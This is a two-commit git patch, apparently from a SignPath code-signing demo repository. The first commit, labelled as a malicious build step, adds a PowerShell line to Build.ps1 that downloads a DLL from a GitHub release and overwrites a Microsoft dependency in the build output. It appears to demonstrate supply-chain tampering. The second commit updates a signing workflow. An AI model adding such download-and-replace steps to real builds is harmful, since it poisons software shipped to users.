From a87a375840c31325ea4849cdcf8e9efba3952943 Mon Sep 17 00:00:00 2001
From: Paul Savoie <paul.savoie@signpath.io>
Date: Sun, 19 May 2024 10:56:57 +0200
Subject: [PATCH 1/2] adds malicious build step

---
 src/Build.ps1 | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/src/Build.ps1 b/src/Build.ps1
index 3614b9a..8dfcaa8 100644
--- a/src/Build.ps1
+++ b/src/Build.ps1
@@ -1,6 +1,10 @@
 # build .Net application
 dotnet build --configuration Release src/DemoExample.csproj
 
+# maliciously replace the Microsoft DLL
+Invoke-WebRequest https://github.com/carterjones/hello-world-dll/releases/download/v1.0.0/hello-world-x64.dll `
+  -OutFile .\src\bin\Release\net7.0\Microsoft.Extensions.DependencyModel.dll
+
 # build MSI installer
 Copy-Item .\src\installer\description.wxs .\src\bin\Release\net7.0\description.wxs -Force
 Push-Location .\src\bin\Release\net7.0

From 8334d232935757021b60ade19fefcb578972ee05 Mon Sep 17 00:00:00 2001
From: Paul Savoie <paul.savoie@signpath.io>
Date: Mon, 27 May 2024 16:38:58 +0200
Subject: [PATCH 2/2] prepares for updated to v0.4

---
 .github/workflows/build-and-sign.yml | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/.github/workflows/build-and-sign.yml b/.github/workflows/build-and-sign.yml
index 24588b2..b6da612 100644
--- a/.github/workflows/build-and-sign.yml
+++ b/.github/workflows/build-and-sign.yml
@@ -6,8 +6,6 @@ run-name: Demo workflow signing with SignPath
 on: 
   push:
   pull_request:
-  #schedule:
-  #  - cron:  '30 3 * * *' # every day at 3:30am UTC
   workflow_dispatch: # Allows you to run this workflow manually from the Actions tab
 
 jobs:
@@ -27,6 +25,7 @@ jobs:
       run: ./sbom/Create-SBOM.ps1
 
     - name: upload-unsigned-artifact
+      id: upload-unsigned-artifact
       uses: actions/upload-artifact@v4
       with:
         name: "demo-application" 
@@ -36,15 +35,19 @@ jobs:
           .\_BuildResult-unsigned\bom.xml
 
     - name: sign
-      uses: signpath/github-action-submit-signing-request@v0.3
+      uses: signpath/github-action-submit-signing-request@v0.4
       env:
-        SIGNPATH_SIGNING_POLICY_SLUG: ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) && 'release-signing' || 'test-signing' }}
+        # select release-signing policy for main and release branches
+        SIGNPATH_SIGNING_POLICY_SLUG: | 
+          ${{ (github.ref == 'refs/heads/main' || startsWith(github.ref, 'refs/heads/release/')) 
+            && 'release-signing' 
+            || 'test-signing' }}
       with:
         api-token: '${{ secrets.SIGNPATH_API_TOKEN }}'
         organization-id: '${{ vars.SIGNPATH_ORGANIZATION_ID }}'
         project-slug: 'Demo_Application'
         signing-policy-slug:  '${{ env.SIGNPATH_SIGNING_POLICY_SLUG }}'
-        github-artifact-name:  "demo-application"
+        github-artifact-id:  "${{steps.upload-unsigned-artifact.outputs.artifact-id}}"
         wait-for-completion: true
         output-artifact-directory: 'demo-application-signed'